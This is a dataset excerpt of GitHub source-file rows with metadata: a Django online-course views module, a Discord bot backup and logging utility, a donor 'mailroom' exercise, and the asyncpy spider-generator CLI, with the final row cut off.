Dataset schema (one row per source file; each row below lists its field values in this column order, separated by `|`):

| column | type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (length 3–281) |
| content_id | string (length 40) |
| detected_licenses | list (length 0–57) |
| license_type | string (2 classes) |
| repo_name | string (length 6–116) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (313 classes) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (18.2k–668M, nullable) |
| star_events_count | int64 (0–102k) |
| fork_events_count | int64 (0–38.2k) |
| gha_license_id | string (17 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (107 classes) |
| src_encoding | string (20 classes) |
| language | string (1 class) |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 (4–6.02M) |
| extension | string (78 classes) |
| content | string (length 2–6.02M) |
| authors | list (length 1) |
| author | string (length 0–175) |
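As an illustrative sketch only (this code is not part of the dataset), rows with this schema could be loaded and filtered roughly as follows; the file name `data.parquet` and the 10 kB size cutoff are assumptions made for the example.

# Minimal sketch, assuming the rows below are available locally as "data.parquet"
# (the file name and the size threshold are assumptions, not part of the dataset).
import pandas as pd

df = pd.read_parquet("data.parquet")

# Keep small, hand-written Python files that are neither vendored nor generated.
small_python = df[
    (df["language"] == "Python")
    & (~df["is_vendor"])
    & (~df["is_generated"])
    & (df["length_bytes"] < 10_000)
]

for row in small_python.itertuples():
    print(row.repo_name, row.path, row.length_bytes)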
013f62d1095057fe79083d89f83110ecb8c70f3f
|
dc99d95671170444cd7bf02e37da6ecda4a5f19e
|
/apps/courses/views.py
|
744bef09fd1699bd93842b7c1d3d4a04ab7d3ca9
|
[] |
no_license
|
bbright3493/python_real_war
|
734d49ed9f7e1800d24dc754424a07b69d7d8c1f
|
6e43bb7d814920222f3310bd6fd9f04cb3d5bbf1
|
refs/heads/master
| 2020-03-30T06:08:40.249185
| 2018-10-22T07:33:41
| 2018-10-22T07:33:41
| 150,841,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,305
|
py
|
# -*- coding: utf-8 -*-
import json
from django.shortcuts import render, HttpResponse
from django.views.generic.base import View
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
from utils.mixin_utils import LoginRequiredMixin
from .models import Course, Lesson, ChoiceQuestion, Video, ProgramQuestion, ChoiceBank, ProgramUpload, CourseCategory, \
Faq
from .models import CourseDirection, KnowledgePoint
from article.models import Article
from operation.models import UserCourse, UserPass, UserErrorChoice
from integral.models import UserIntergral, IntergralDemand
from .forms import ProgramUploadForm
from project.models import ProjectShow
# Create your views here.
class CourseListView(View):
"""
Course list page
"""
def get(self, request):
all_category = CourseCategory.objects.all()
all_direction = CourseDirection.objects.all()
click_direction = request.GET.get("direction", "all")
click_category = request.GET.get("category", "all")
click_degree = request.GET.get("degree", "all")
click_sort = request.GET.get("sort", "new")
print(click_direction)
if click_direction == "all":
if click_category == "all":
if click_degree == "all":
all_course = Course.objects.all().order_by("-add_time")
if click_sort == "hot":
all_course = Course.objects.all().order_by("-students")
else:
all_course = Course.objects.filter(degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
if click_degree == "all":
all_course = Course.objects.filter(coursecategory__category=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = Course.objects.filter(coursecategory__category=click_category,
degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = Course.objects.filter(direction=click_direction)
print("all:", all_course)
if click_category == "all":
if click_degree == "all":
all_course = all_course.order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = all_course.filter(degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
if click_degree == "all":
all_course = all_course.filter(coursecategory__category=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = all_course.filter(coursecategory__category=click_category,
degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_course, 6, request=request)
courses = p.page(page)
print(type(courses))
print("session:", request.session.get('Linux', default="Html"))
return render(request, 'course_list.html', {
"all_direction": all_direction,
"all_course": courses,
"all_category": all_category,
"click_direction": click_direction,
"click_category": click_category,
"click_degree": click_degree,
"click_sort": click_sort,
})
class CourseLevelView(View):
"""
Course level list page
When displaying the levels, also query the user's per-level records so that each level's learning progress for this user can be shown
"""
def get(self, request, course_id):
course = Course.objects.get(id=int(course_id))
# Check whether the user is already linked to this course
try:
user_course = UserCourse.objects.get(user=request.user, course=course)
except:
user_course = UserCourse(user=request.user, course=course)
user_course.save()
students = UserCourse.objects.all().count()
course.students = int(students)
course.save()
all_level = Lesson.objects.filter(course=course_id).order_by("add_time")
this_level = Lesson.objects.filter(course=course_id).first()
# For every level of this course, look up the corresponding user-level record; create one if it does not exist
for level in all_level:
try:
cur_user_level = UserPass.objects.get(user=request.user, lesson=level)
except:
cur_user_level = UserPass(user=request.user, lesson=level)
cur_user_level.save()
user_levels = UserPass.objects.filter(user=request.user, lesson__course=course).order_by("lesson")
# # Next level
# try:
# next_level = Lesson.objects.filter(course=course_id).order_by("add_time")[Level_num+1]
# except IndexError:
# next_level = Lesson.objects.filter(course=course_id).order_by("add_time")[Level_num]
#
# # Unlock the next level
# if this_level.pass_level:
# next_level.pass_level = True
last_level = Lesson.objects.filter(course=course_id).last()
projects = ProjectShow.objects.filter(course=course)
return render(request, 'course_level.html', locals())
class CourseDetailView(View):
"""
Level detail page
"""
def get(self, request, course_id, lesson_id):
course = Course.objects.get(id=course_id)
# Check the user's course status; if it is "not started", change it to "in progress"
user_course = UserCourse.objects.get(user=request.user, course=course)
if user_course.study_status == 1:
user_course.study_status = 2
user_course.save()
lesson = Lesson.objects.get(id=lesson_id)
try:
user_lesson = UserPass.objects.get(user=request.user, lesson=lesson)
except:
user_lesson = UserPass(user=request.user, lesson=lesson)
user_lesson.save()
print(lesson)
# user_intergral = UserIntergral.objects.get(user=request.user)
extend_demand = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand='extend_download')
# explain_demand = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand='pro_explain')
all_vedio = Video.objects.filter(lesson_id=lesson_id)
all_article = Article.objects.filter(lesson=lesson).order_by('no')
choice_bank = lesson.get_choice_bank()
program_bank = lesson.get_program_bank()
faqs = Faq.objects.filter(lesson=lesson)
knowledge_points = KnowledgePoint.objects.filter(lesson=lesson)
lesson_projects = ProjectShow.objects.filter(lesson=lesson)
return render(request, 'course_detail.html', locals())
class ChoiceQuestionAnswerView(View):
"""
Multiple-choice question
"""
def get(self, request, course_id, lesson_id, choice_id):
lesson_choices = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id))
this_question = ChoiceQuestion.objects.get(id=choice_id)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
is_last = False
if int(choice_id) == all_question_num:
is_last = True
return render(request, 'choice_answer.html', locals())
class ChoiceQuestionView(View):
"""
Multiple-choice question
"""
def get(self, request, course_id, lesson_id, choice_id):
lesson_choices = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id))
this_question = ChoiceQuestion.objects.get(id=choice_id)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print(all_question_num)
if int(this_question.question_num) == 1:
request.session['right_count'] = 0
request.session['error'] = []
is_last = False
if this_question.question_num == all_question_num:
is_last = True
next_question = this_question
else:
next_question = ChoiceQuestion.objects.get(question_num=this_question.question_num+1,
choicebank=this_question.choicebank)
return render(request, 'choice_pra.html', locals())
class NextQuestionView(View):
"""
Next question
"""
def post(self, request):
this_question = request.POST.get("practice_num", 1)
user_answer = request.POST.get("user_answer", "")
if int(user_answer) != -1:
# Get the correct answer for this question
right = ChoiceQuestion.objects.get(id=int(this_question))
right_answer = right.answer
if int(user_answer) + 1 == right_answer:
print("答对本题")
request.session['right_count'] = request.session.get('right_count', default=0) + 1
else:
print("本题错误")
l = request.session['error']
l.append(right.id)
request.session['error'] = l
user_pass = UserPass.objects.get(user=request.user, lesson=right.lesson)
# Check whether this is the first answer submission
if user_pass.choice_status == 0:
user_course = UserCourse.objects.get(user=request.user, course=right.lesson.course)
# Check whether the user has course VIP or level VIP access
if user_course.course_status == 2 or user_pass.status == 2:
error_question = UserErrorChoice()
error_question.user = request.user
error_question.choice = right
error_question.user_answer = int(user_answer) + 1
error_question.save()
value = {"status": "success"}
print("session", request.session['right_count'])
return HttpResponse(json.dumps(value), content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"没有进行选择"}', content_type='application/json')
class ChoiceResultView(View):
"""
Multiple-choice results
"""
def get(self, request, course_id, lesson_id):
right_nums = request.session.get('right_count', default=0)
user_errors = request.session.get('error', default=[])
errors = []
for error in user_errors:
errors.append(ChoiceQuestion.objects.get(id=int(error)))
print("right_nums:", right_nums)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print("all_num:", all_question_num)
right_rate = int(int(right_nums) / float(all_question_num) * 100)
print(right_rate)
lesson = Lesson.objects.get(id=lesson_id)
course = Course.objects.get(id=course_id)
# Save the submission status; only users with VIP access have this status updated
user_pass = UserPass.objects.get(user=request.user, lesson=lesson)
user_course = UserCourse.objects.get(user=request.user, course=course)
if user_pass.choice_status == 0 and (user_pass.status == 2 or user_course.course_status == 2):
user_pass.choice_status = 1
user_pass.save()
return render(request, 'choice_result.html', locals())
class ProgramView(View):
"""
Programming exercise
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
program = ProgramQuestion.objects.get(id=program_id)
all_question_num = ProgramQuestion.objects.filter(program_bank=program.program_bank).count()
if int(program.question_num) == 1:
request.session['right_count_program'] = 0
request.session['error_program'] = []
is_last = False
# Check whether this is the last question
if program.question_num == all_question_num:
is_last = True
next_program = program
else:
next_program = ProgramQuestion.objects.get(question_num=program.question_num+1, program_bank=program.program_bank )
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program.html', locals())
class ProgramingView(View):
"""
Coding page for the programming exercise
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
program = ProgramQuestion.objects.get(id=program_id)
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program_start.html', locals())
class ProgramingCommitView(View):
"""
Handling of submitted code
"""
def post(self, request):
user_answer = request.POST.get("code", "")
program_id = request.POST.get("program_id", "")
print(user_answer)
program_question = ProgramQuestion.objects.get(id=int(program_id))
if program_question.result == user_answer:
value = {"status": "success", "result": "ok"}
else:
value = {"status": "success", "result": "error"}
return HttpResponse(json.dumps(value), content_type='application/json')
class NextProgramView(View):
"""
Next question
"""
def post(self, request):
this_question_num = request.POST.get("practice_num", 1)
this_question_id = request.POST.get("practice_id", 1)
result = request.POST.get("result", "")
this_program = ProgramQuestion.objects.get(id=this_question_id)
if int(result) == 1:
print("答对本题")
request.session['right_count_program'] = request.session.get('right_count_program', default=0) + 1
else:
print("本题错误")
l = request.session['error_program']
l.append(this_program.id)
request.session['error_program'] = l
value = {"status": "success"}
print("session", request.session['right_count_program'])
return HttpResponse(json.dumps(value), content_type='application/json')
class ProgramCommitView(View):
"""
Programming exercise
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program-commit.html', {
# "program_file": program_file,
"program_result": program_result,
"program_id": program_id,
})
class ProgramUploadView(View):
"""
Programming project upload
"""
def post(self, request):
file_obj = request.FILES.get('file')
image_obj = request.FILES.get('image')
learned_obj = request.POST.get('learn')
programId_obj = request.POST.get('programId')
program = ProgramQuestion.objects.get(id=int(programId_obj))
# user = request.user
if file_obj and image_obj:
program_result = ProgramUpload()
program_result.programquestion = program
program_result.user = request.user
program_result.upload = file_obj
program_result.image = image_obj
program_result.learned = learned_obj
program_result.is_complete = True
program_result.save()
return HttpResponse('{"status":"success"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail"}', content_type='application/json')
class ProgramResultView(View):
"""
Programming exercise results
"""
def get(self, request, course_id, lesson_id):
right_nums = request.session.get('right_count_program', default=0)
user_errors = request.session.get('error_program', default=[])
errors = []
for error in user_errors:
errors.append(ProgramQuestion.objects.get(id=int(error)))
errors = list(set(errors))
print("right_nums:", right_nums)
all_question_num = ProgramQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print("all_num:", all_question_num)
right_rate = int(int(right_nums) / float(all_question_num) * 100)
print(right_rate)
lesson = Lesson.objects.get(id=lesson_id)
course = Course.objects.get(id=course_id)
return render(request, 'program_result.html', locals())
class PostView(View):
def post(self, request):
import time
import os
from programing import settings
file_obj = request.FILES.get('file')
image_obj = request.FILES.get('image')
if file_obj: # method that handles the attachment upload
request_set = {}
print('file--obj', file_obj)
# user_home_dir = "upload/%s" % (request.user.userprofile.id)
accessory_dir = settings.BASE_DIR
if not os.path.isdir(accessory_dir):
os.mkdir(accessory_dir)
upload_file = "%s/%s" % (accessory_dir, file_obj.name)
recv_size = 0
with open(upload_file, 'wb') as new_file:
for chunk in file_obj.chunks():
new_file.write(chunk)
order_id = time.strftime("%Y%m%d%H%M%S", time.localtime())
# cache.set(order_id, upload_file)
return HttpResponse(order_id)
class CompleteView(View):
"""
Level completed
"""
def post(self, request):
course_id = request.POST.get("course_id", 1)
lesson_id = request.POST.get("lesson_id", 1)
print(type(int(course_id)), int(course_id))
this_lesson = Lesson.objects.get(course_id=int(course_id), id=int(lesson_id))
print(this_lesson)
this_lesson.pass_level = True
last_level = Lesson.objects.filter(course=int(course_id)).last()
print(last_level)
choice_bank = ChoiceBank.objects.get(lesson=int(lesson_id))
print(choice_bank)
program_question = ProgramQuestion.objects.get(lesson=int(lesson_id))
if choice_bank.is_complete == True and program_question.is_complete == True:
if int(lesson_id) != last_level.id:
next_level = Lesson.objects.filter(course=int(course_id)).order_by("-add_time")[int(lesson_id) + 1]
print("next:", next_level)
next_level.open_level = True
this_lesson.pass_level = True
this_lesson.save()
next_level.save()
else:
this_lesson.pass_level = True
this_lesson.save()
value = {"status": "success", "msg": "已完成"}
return HttpResponse(json.dumps(value), content_type='application/json')
else:
value = {"status": "fail", "msg": "你还没有完成全部任务"}
return HttpResponse(json.dumps(value), content_type='application/json')
# class ProjectShowView(View):
# """
# Project showcase
# """
#
# def get(self, request):
# all_category = CourseCategory.objects.all()
#
# click_category = request.GET.get("category", "all")
# click_course = request.GET.get("course", "all")
# click_level = request.GET.get("level", "all")
# all_level = Lesson.objects.filter(course__name=click_course)
#
# if click_category == "all":
# print("category:", click_category)
# all_project = ProgramUpload.objects.filter(is_show=True).order_by("-add_time")
# all_course = Course.objects.filter()
# else:
# all_course = Course.objects.filter(coursecategory__category=click_category)
# if click_course == "all":
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# is_show=True)
# else:
# if click_level == "all":
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# lesson__course__name=click_course,
# is_show=True)
# else:
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# lesson__course__name=click_course,
# lesson__name=click_level,
# is_show=True)
# # Paginate the courses
# try:
# page = request.GET.get('page', 1)
# except PageNotAnInteger:
# page = 1
#
# p = Paginator(all_project, 6, request=request)
# projects = p.page(page)
#
# return render(request, "project_show.html", {
# "all_category": all_category,
# "click_category": click_category,
# "all_course": all_course,
# "click_course": click_course,
# "all_level": all_level,
# "click_level": click_level,
# "projects": projects,
#
# })
# class ProjectResultView(View):
# """
# Project showcase results
# """
#
# def get(self, request, lesson):
# try:
# program_result = ProgramUpload.objects.get(lesson__name=lesson, user=request.user)
# except ProgramUpload.DoesNotExist:
# program_result = ProgramUpload.objects.all()
# print(program_result)
# return render(request, "project_result.html", {
# "program_result": program_result
# })
class DownloadUrlView(View):
"""链接下载"""
def post(self, request):
course_id = request.POST.get("course_id", 1)
lesson_id = request.POST.get("lesson_id", 1)
type = request.POST.get("type", "")
user_intergral = UserIntergral.objects.get(user=request.user)
demand_intergral = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand=type)
if user_intergral.grade >= demand_intergral.intergral:
user_intergral.grade = user_intergral.grade - demand_intergral.intergral
user_intergral.save()
demand_intergral.download_count += 1
demand_intergral.save()
value = {"status": "success", "re_url": demand_intergral.url}
return HttpResponse(json.dumps(value), content_type='application/json')
else:
value = {"status": "fail", "msg": "您的积分不足,请充值!"}
return HttpResponse(json.dumps(value), content_type='application/json')
|
[
"44704708@qq.com"
] |
44704708@qq.com
|
43b3dcc73cfdcbc4c2c4e592fd97bc7d88a60d21
|
fde6081d838481a2451e435d7ce1e8efd41d8c2c
|
/Util.py
|
4bdaced86fbd3fafe543135c25e5b4d54a20dc30
|
[] |
no_license
|
parthivpatel1106/SleepBot
|
b067bbf27275b4ab35136c912a167a411da57ad2
|
09979d273fa761da09201d5166bbbf3dc4819c01
|
refs/heads/main
| 2023-01-21T21:45:39.471169
| 2020-12-03T12:48:49
| 2020-12-03T12:48:49
| 318,178,217
| 0
| 0
| null | 2020-12-03T11:57:42
| 2020-12-03T11:57:42
| null |
UTF-8
|
Python
| false
| false
| 2,592
|
py
|
import discord
from discord.ext import commands
import asyncio
import os
import random
# For Database related stuff
import sqlite3
from dotenv import load_dotenv
from datetime import datetime
from datetime import date
POINT = {}
# Open and connect to Database File
conn = sqlite3.connect('Database.db')
c = conn.cursor()
c.execute("SELECT channel_ID FROM channel_table WHERE title='LOG';")
LOG = c.fetchone()
c.execute("SELECT user_id, points FROM point_table;")
DB_POINT = c.fetchall()
c.execute("SELECT channel_ID FROM channel_table WHERE title='POINT';")
POINTCMD = c.fetchone()
POINTCMD = int(POINTCMD[0])
def is_point_cmd_chnl():
def predicate(ctx):
return int(ctx.channel.id) == int(POINTCMD)
return commands.check(predicate)
conn.close()
# For Backup to Database
async def Backup(client):
await client.wait_until_ready()
global POINT
global DB_POINT
while not client.is_closed():
await client.get_channel(LOG[0]).send(f"Backup OK: ```{datetime.now()}```")
# Repeat every 30 minutes
await asyncio.sleep(1800)
conn = sqlite3.connect('Database.db')
c = conn.cursor()
c.execute("SELECT user_id, points FROM point_table;")
DB_POINT = c.fetchall()
await client.get_channel(int(LOG[0])).send(f"Performing Backup: ```{datetime.now()}```")
# POINT BACKUP
for user in DB_POINT:
if user[0] in POINT:
c.execute("UPDATE point_table SET points = {} WHERE user_ID = {}".format(POINT[user[0]]+user[1],user[0]))
is_instance = False
for user in POINT:
for elm in DB_POINT:
if user in elm:
is_instance = True
break
if not is_instance:
c.execute("INSERT INTO point_table VALUES (NULL, {}, {});".format(user,POINT[user]))
is_instance = False
c.execute("SELECT user_ID, points FROM point_table;")
DB_POINT = c.fetchall()
conn.commit()
conn.close()
POINT = {}
# Function to log commands
async def command_log(client, ctx, cmd_name):
embed = discord.Embed(
title = "SleepBot Command Logs",
description = ("Command: {}\nMessage Content: {}".format(cmd_name, ctx.message.content)),
colour = random.randint(0, 0xffffff)
)
embed.add_field(name = "In Guild:", value = "{}".format(ctx.guild), inline = False)
embed.add_field(name = "In Channel:", value = "{} Channel_ID: {}".format(ctx.channel, ctx.channel.id), inline = False)
embed.add_field(name = "Author:", value = "{}, Nick: {}, ID: {}".format(ctx.author, ctx.author.nick, ctx.author.id), inline = False)
embed.add_field(name = "Time:", value = "{}".format(datetime.now()), inline = False)
await client.get_channel(LOG[0]).send(embed = embed)
|
[
"62468954+ZeusAbhijeet@users.noreply.github.com"
] |
62468954+ZeusAbhijeet@users.noreply.github.com
|
41edfbdd80492e88bc1f100c372ba51fd0c98a92
|
71788a22dcaeb2fbde56b87fabf7ee21df3a770f
|
/students/matthew_denko/lesson05/mailroom_pt3.py
|
4786a37f7981960ed69bbf09917b1619138c8d18
|
[] |
no_license
|
UWPCE-PythonCert-ClassRepos/Python210_Fall2019
|
5bdfc1c919666eccb42ee07a1d7e385b21f11652
|
e45481671684a3cc8a469461a15cd9f660752ee0
|
refs/heads/master
| 2020-08-05T16:33:53.068983
| 2019-12-29T09:57:59
| 2019-12-29T09:57:59
| 212,615,940
| 4
| 34
| null | 2019-12-29T09:58:00
| 2019-10-03T15:38:40
|
Python
|
UTF-8
|
Python
| false
| false
| 8,603
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 06:34:53 2019
@author: matt.denko
"""
# pt 3 description ------------------------------------------------------------
"""Exceptions
Now that you’ve learned about exception handling, you can update your
code to handle errors better, such as when a user inputs bad data."""
"""Comprehensions
Can you use comprehensions to clean up your code a bit?
List comprehensions are designed for a very specific use case:
Processing a sequence of items to create another sequence."""
# importing packages ----------------------------------------------------------
import sys
import os
# Creating donor list----------------------------------------------------------
donors = dict()
"Convert main donor data structure to be a dict"
def new_donor(name, total=0, gifts=0, avg_gift=0):
"function to add new donor to dictionary - along with average gift, total gift, number of gifts"
if name not in donors:
"if donor not in original list then add it to list, if it already exists do nothing"
if gifts > 0:
"If gift value is 0 or less do not add - not a valid donation"
avg_gift = round(total/gifts, 2)
donors[name] = {'donation_total':round(total, 2), 'donation_ct':int(gifts), 'donation_avg':avg_gift}
def create_donors():
"function to create donor list, col1 - donor, col2 - average gift, col3 - number of gifts"
new_donor("Dennis Rodman", 1111, 1)
new_donor("Suge Knight", 2222.22, 2)
new_donor("Dumbledore", 33333.33, 3)
new_donor("Grizzly Adams", 44444, 1)
new_donor("Bob Evans", 555,2)
new_donor("Barron Trump", 66.55, 1)
# exit program ----------------------------------------------------------------
def exit_program():
"Creating a function to exit and stop program at any time"
print("Now exiting....goodbye\n")
"fixing from pt 1 - actually exiting :)"
sys.exit()
# Creating home screen text ---------------------------------------------------
home_screen_text = ("\nWelcome to the home screen please select one of option 1 through 3:\n"
"1: Make a Thank You\n"
"2: Make a Report\n"
"3: Make a letter\n"
"4: Exit\n")
def create_thank_you_note(name,amount):
"custom thank you note to automatically send the option is chose"
print(f"\nTo my dearest {name}:\n\n Thank you so much for your giant donation of ${amount}.",\
"We are extremely thankful for your donation.\n\n.")
# home screen function creation -----------------------------------------------
def home_screen(_):
"function to print text of home screen - unless an action is chosen"
while True:
print(home_screen_text)
action = input("")
if action in _:
_[action]()
if action == "exit":
"if action is exit chosen then break this function"
break
# creating custom thank you function ------------------------------------------
donor_new = ()
def make_thank_you():
""""Function to create custom thank you note for donor, the function also
prompts user to add a new donor and will add the donor to the existing
dictionary if it does not already exist"""
try:
user_text = ""
thank_you = """"To go to home screen please enter 'exit'.
\nType the name of a donor or type 'donors' to view list of donors\n"""
while user_text != "exit":
user_text = input(thank_you)
while user_text == "donors":
for name in donors:
print(name)
user_text = input(thank_you)
if user_text == "exit":
break
donation_amount = input("Please enter donation amount: ")
if donation_amount == "exit":
break
"new list comprehension"
donors_new = [new_donor(user_text) for _ in user_text if user_text not in donors]
"if the users input is a donor not in the current list then add it"
donors[user_text]['donation_total'] += float(donation_amount)
"total as a float"
donors[user_text]['donation_ct'] += 1
"count as an int"
donors[user_text]['donation_avg'] = donors[user_text]['donation_total']/donors[user_text]['donation_ct']
"avg will be a float due to dividing by float"
create_thank_you_note(user_text,donation_amount)
user_text = "q"
except ValueError as error:
"Adding exception handling for ValueError"
print('Please donate an actual amount of money....aka a float or int!')
donation_amount = input("Please enter donation amount: ")
"new list comprehension"
donors_new = [new_donor(user_text) for _ in user_text if user_text not in donors]
"if the users input is a donor not in the current list then add it"
donors[user_text]['donation_total'] += float(donation_amount)
"total as a float"
donors[user_text]['donation_ct'] += 1
"count as an int"
donors[user_text]['donation_avg'] = donors[user_text]['donation_total']/donors[user_text]['donation_ct']
"avg will be a float due to dividing by float"
create_thank_you_note(user_text,donation_amount)
user_text = "q"
finally:
"finally in case of double exception"
line1 = '\n lets start over...back to main menu....\n\n'
line2 = 'Please this time if you choose to make a thank you enter an integer or float in the amount!!!!!...\n\n '
lp = '\n'.join([line1, line2])
print(lp)
home_screen(home_screen_summary)
# making report ---------------------------------------------------------------
def make_report():
"""Function to create a custom report if the action is choosen by the user.
The report will contain the donation total, the count of donations, and the
average donation for each donor"""
output = sorted(donors.items(), key = lambda e: e[1]['donation_total'], reverse=True)
print("Donor Name"," Total Given - Num Gifts - Average Gift")
for item in output:
print("{:25} ${:>11.2f}{:>12d} ${:>12.2f}".format(item[0],
item[1]['donation_total'], item[1]['donation_ct'], item[1]['donation_avg']))
# letter prompt ---------------------------------------------------------------
def letter_prompt():
"function to create letter prompt for custom donor letters"
line1 = 'To my dearest and special friend {name},\n\n' \
+ 'Thank you for your awe inspiring donation of ${last:.2f}!'
line2 = 'With this latest personal sacrifice your lifetime donations total is ${total:.2f}!!!!!! ' \
+ 'Best Wishes,\n\nMatthew Denko, Decider of Things\n'
lp = '\n'.join([line1, line2])
"returning joined prompt"
return lp
# writing letters -------------------------------------------------------------
def make_letter():
"function to create custom letter files for each donor"
try:
"creating a new folder in the current working directory named thank_you_notes"
new_folder = os.mkdir(os.getcwd() + '//donationletters')
new_folder = os.getcwd() + '//donationletters'
except FileExistsError:
"exception in case file is already there"
new_folder = os.getcwd() + '//donationletters'
"loop to create note"
for i in donors:
donors2 = donors[i]
letter_details = {'name': i,
'last': donors2['donation_avg'],
'total': donors2['donation_total']}
file = new_folder + '//' + letter_details['name'].replace(' ', '_') + '.txt'
with open(file, 'w') as letter:
"using .format() method to produce the letter as one big template"
letter_note = letter_prompt()
letter.write(letter_note.format(**letter_details))
# home screen summary ---------------------------------------------------------
"See if you can use a dict to switch between the user’s selections"
home_screen_summary = {"1": make_thank_you, "2":make_report, "3":make_letter, "4":exit_program}
# if _name_ == '_main_' block -------------------------------------------------
if __name__ == '__main__':
"If this is the main file then execute these functions"
create_donors()
"create donors function generates donor list"
home_screen(home_screen_summary)
"""home screen function prints home_screen_summary which contains functions
for all of the menu prompts"""
|
[
"denkmatt@umich.edu"
] |
denkmatt@umich.edu
|
834db63d639b48b74456b466a1a37de5eec65799
|
c5a013595c7f5000d817c37f94db174751fba865
|
/asyncpy/asyncpy/__init__.py
|
fcbdb02e7bff8b3a5e36ea7fbc6107adceff159b
|
[
"MIT"
] |
permissive
|
Fenfenrao/asyncpy
|
c3b8d7ee5399f11e49c711d917fd8f9fd2b370d5
|
9c0b4ebe2f30cd4381c8cc0407f7dc98b1fd72c3
|
refs/heads/master
| 2022-07-28T20:08:43.063804
| 2020-05-25T05:05:21
| 2020-05-25T05:05:21
| 266,761,650
| 1
| 0
| null | 2020-05-25T11:28:34
| 2020-05-25T11:28:34
| null |
UTF-8
|
Python
| false
| false
| 1,620
|
py
|
# -*- coding: utf-8 -*-
"""Asyncpy
Usage:
asyncpy genspider <name>
asyncpy (-h | --help | --version)
Options:
--version Show version.
"""
from asyncpy.middleware import Middleware
from asyncpy.request import Request
from asyncpy.response import Response
from asyncpy.spider import Spider
from asyncpy.exceptions import IgnoreThisItem
from pathlib import Path
from docopt import docopt
__all__ = ["Middleware","Request","Response","Spider","IgnoreThisItem"]
VERSION = '1.1.5'
DEFAULT_ENCODING = 'utf-8'
import os
import shutil
def create_base(name):
template = 'templates'
template_path = Path(__file__).parent / template
project_path = os.path.join(os.getcwd(), name)
if not os.path.exists(project_path):
shutil.copytree(template_path, project_path)
os.rename(project_path,project_path)
spider_path = os.path.join(project_path, 'spiders/templates.py')
new_spider_path = os.path.join(project_path, 'spiders/{}.py'.format(name))
os.rename(spider_path,new_spider_path)
with open(file=new_spider_path,mode='r',encoding='utf-8')as f:
doc = f.read()
doc = doc.replace('templates',name).replace('Demo',name.capitalize())
with open(file=new_spider_path,mode='w',encoding='utf-8')as f1:
f1.write(doc)
print("Created successfully")
else:
print("file already exist")
def cli():
"""
Commandline for Asyncpy :d
"""
argv = docopt(__doc__, version=VERSION)
if argv.get('genspider'):
name = argv['<name>']
create_base(name=name)
|
[
"125066648@qq.com"
] |
125066648@qq.com
|
51930079a3309f6d30abe786051977a566ea742b
|
c9af07e4b045b897734f29ff1f8a211aa40d0822
|
/TextNook Assignment/reddit/blog/urls.py
|
2675016b19ebf5206ecfe6d1bc71d078d28d8538
|
[] |
no_license
|
vinyasmusic/Projects
|
20294e89c2905d5b5c54d21edb06f3076948051a
|
2dd1c05267b86d069a1185cd843e8a4d2bdf6123
|
refs/heads/master
| 2020-04-06T04:04:53.532872
| 2017-01-14T05:06:59
| 2017-01-14T05:06:59
| 58,999,243
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
from django.conf.urls import url
from . import views
from blog.views import PostListView
urlpatterns = [
#url(r'^$', views.post_list, name='post_list'),
url(r'^$',PostListView.as_view())
#url(r'^post/new/$', views.post_new, name='post_new'),
]
|
[
"vinyasmusic@gmail.com"
] |
vinyasmusic@gmail.com
|
5d0d6f69f6660e6ef026a817f19eea6376397f45
|
e9f9c70bf80bf95db4d323cfc7a019c30c55e04c
|
/Sapient Challenge/SapientChallenge/EventGenerator.py
|
